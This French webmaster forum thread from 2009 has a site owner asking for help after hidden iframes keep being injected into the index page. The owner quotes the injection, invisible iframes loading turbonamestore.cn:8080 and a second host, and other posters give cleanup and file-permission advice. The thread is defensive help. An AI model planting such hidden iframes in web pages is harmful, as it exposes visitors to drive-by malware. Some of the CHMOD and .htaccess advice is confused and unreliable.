mon site est hacké ?
10 messages
• Page 1 sur 1
Consultez la formation à Google Analytics de WebRankInfo / Ranking Metrics
- voyagesnet
- WRInaute discret
- Messages: 64
- Inscription: 23 Juin 2008
mon site est hacké ?
le Sam Juin 20, 2009 9:25
bonjour
j'ai un souci
vraiment je ne sais pas d'où il vient le problème
chaque 2 jours
je trouve quelques balises que sont effacés et je trouve un autre code qui s'ajoute automatiquement juste en avant de <body>
voila le code
parfois:
<iframe src="http://turbonamestore.cn:8080/index.php" width=160 height=163 style="visibility: hidden"></iframe>
et parfois:
parfois:
<iframe src="http://javagoogle/index.php" width=160 height=163 style="visibility: hidden"></iframe>
je ne sais pas c'est quoi exactement ?sachant que la page index de site seulement que se change
y'a t 'il de réponse SVp ?
supposant que mon site est hacké quels sont les mesures à prendre pour le securiser complétement
sachant que je fais aujourd'hui le changement de mot de passe de ftp
est ce que ce problème peut être cause d'un mauvais script utiliser sachant qu'il a commencer dès mon installation d'un script de analytics (php-stats0-1.9.2
merci
cordialement
j'ai un souci
vraiment je ne sais pas d'où il vient le problème
chaque 2 jours
je trouve quelques balises que sont effacés et je trouve un autre code qui s'ajoute automatiquement juste en avant de <body>
voila le code
parfois:
<iframe src="http://turbonamestore.cn:8080/index.php" width=160 height=163 style="visibility: hidden"></iframe>
et parfois:
parfois:
<iframe src="http://javagoogle/index.php" width=160 height=163 style="visibility: hidden"></iframe>
je ne sais pas c'est quoi exactement ?sachant que la page index de site seulement que se change
y'a t 'il de réponse SVp ?
supposant que mon site est hacké quels sont les mesures à prendre pour le securiser complétement
sachant que je fais aujourd'hui le changement de mot de passe de ftp
est ce que ce problème peut être cause d'un mauvais script utiliser sachant qu'il a commencer dès mon installation d'un script de analytics (php-stats0-1.9.2
merci
cordialement
- darkjukka
- WRInaute impliqué
- Messages: 669
- Inscription: 28 Avr 2007
Re: mon site est hacké ?
le Sam Juin 20, 2009 10:06
Je pense que cette petite liste ne sera pas superflue :
- Ré-uploader tout ton site en étant sûr que les fichiers sont sains
- Changer ton mot de passe FTP
- Mettre un CHMOD pour éviter la modification de tes fichiers comme le 404 par exemple
- Bien vérifier que tout tes scripts sont à jour et qu'ils n'ont pas de failles connues
- Changer ton mot de passe de BDD aussi à tout hasard, mieux vaut prévenir que guérir
- voyagesnet
- WRInaute discret
- Messages: 64
- Inscription: 23 Juin 2008
Re: mon site est hacké ?
le Sam Juin 20, 2009 10:39
darkjukka a écrit:Je pense que cette petite liste ne sera pas superflue :
- Ré-uploader tout ton site en étant sûr que les fichiers sont sains
- Changer ton mot de passe FTP
- Mettre un CHMOD pour éviter la modification de tes fichiers comme le 404 par exemple
- Bien vérifier que tout tes scripts sont à jour et qu'ils n'ont pas de failles connues
- Changer ton mot de passe de BDD aussi à tout hasard, mieux vaut prévenir que guérir
bonjour
le chmod est par defaut chmod 777 sur le fichier
alors qu'est ce que je dois changer comme droit sur les fichiers?
et j'utilise aussi le fichier:
error401.html
error400.html
error403.html
error500.html
- darkjukka
- WRInaute impliqué
- Messages: 669
- Inscription: 28 Avr 2007
Re: mon site est hacké ?
le Sam Juin 20, 2009 11:06
Oula 777 c'est le pire ! Tout le monde peut le modifier
Passe le CHMOD à 404 ca ne sera que plus sécurisé.
Tes pages d'erreur perso n'ont rien à voir ici quand je parlais de 404 c'est bien du CHMOD ^^
Passe le CHMOD à 404 ca ne sera que plus sécurisé.
Tes pages d'erreur perso n'ont rien à voir ici quand je parlais de 404 c'est bien du CHMOD ^^
- voyagesnet
- WRInaute discret
- Messages: 64
- Inscription: 23 Juin 2008
Re: mon site est hacké ?
le Sam Juin 20, 2009 11:52
darkjukka a écrit:Oula 777 c'est le pire ! Tout le monde peut le modifier
Passe le CHMOD à 404 ca ne sera que plus sécurisé.
Tes pages d'erreur perso n'ont rien à voir ici quand je parlais de 404 c'est bien du CHMOD ^^
mais si je passe le CHMOD en 404 alors comme ca je n'aurais pas l'autirisation ni de modifier ni d'executer les fichiers et les dossier
c'est mieux de faire 704 n'est ce pas et est ce que je dois faire ca sur tous les fichiers et les dossiers c a d sur le dossier www?
merci
cordialement
- darkjukka
- WRInaute impliqué
- Messages: 669
- Inscription: 28 Avr 2007
Re: mon site est hacké ?
le Sam Juin 20, 2009 12:20
Perso j'ai tout mes fichier en 404 et je change en 604 quand je dois les modifier pour une raison ou une autre.
Après mes dossier sont en 505 si je ne me trompe pas ça permet de ne pas rajouter d'autres fichiers, puis je passe en 705 pour en ajouter un nouveau
Après mes dossier sont en 505 si je ne me trompe pas ça permet de ne pas rajouter d'autres fichiers, puis je passe en 705 pour en ajouter un nouveau
- voyagesnet
- WRInaute discret
- Messages: 64
- Inscription: 23 Juin 2008
Re: mon site est hacké ?
le Sam Juin 20, 2009 12:37
darkjukka a écrit:Perso j'ai tout mes fichier en 404 et je change en 604 quand je dois les modifier pour une raison ou une autre.
Après mes dossier sont en 505 si je ne me trompe pas ça permet de ne pas rajouter d'autres fichiers, puis je passe en 705 pour en ajouter un nouveau
et pusique je travail en plein temp sur le site
alors
à chaque remonte de fichier je dois changer l'accés?
bon pour le www je fais CHMOD 705
et pour les autres fichiers et dossiers je fais 755
que pensez vous comme ça?
y'a t 'il d'inconvénient?
merci
- voyagesnet
- WRInaute discret
- Messages: 64
- Inscription: 23 Juin 2008
Re: mon site est hacké ?
le Dim Juin 21, 2009 8:58
mi-mi a écrit:Attention aux Chmods certains hébergeurs sont uniquement en 666 et 777
je trouve que c'est mieux de travailler en htacces
bonjour
même avec le htaccess je va utiliser le CHMOD non?
sinon
je crois que je dois écrire dans chaque fichier :
-> AllowOverride All pour donner l'accées à tous
sinon comment faire pour definir l'accés au propriétaire de site , l'internaute et le groupe de travail
est ce qu'il est utile d'utiliser le .htpassword
merci
bye
10 messages
• Page 1 sur 1
Formation recommandée sur ce thème :
Formation Google Analytics : en 2 jours, apprenez comment exploiter l'essentiel des possibilités de l'outil de mesure d'audience de Google. Formation animée par les experts Google Analytics de Ranking Metrics.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 1 invité
Contact
Confidentialité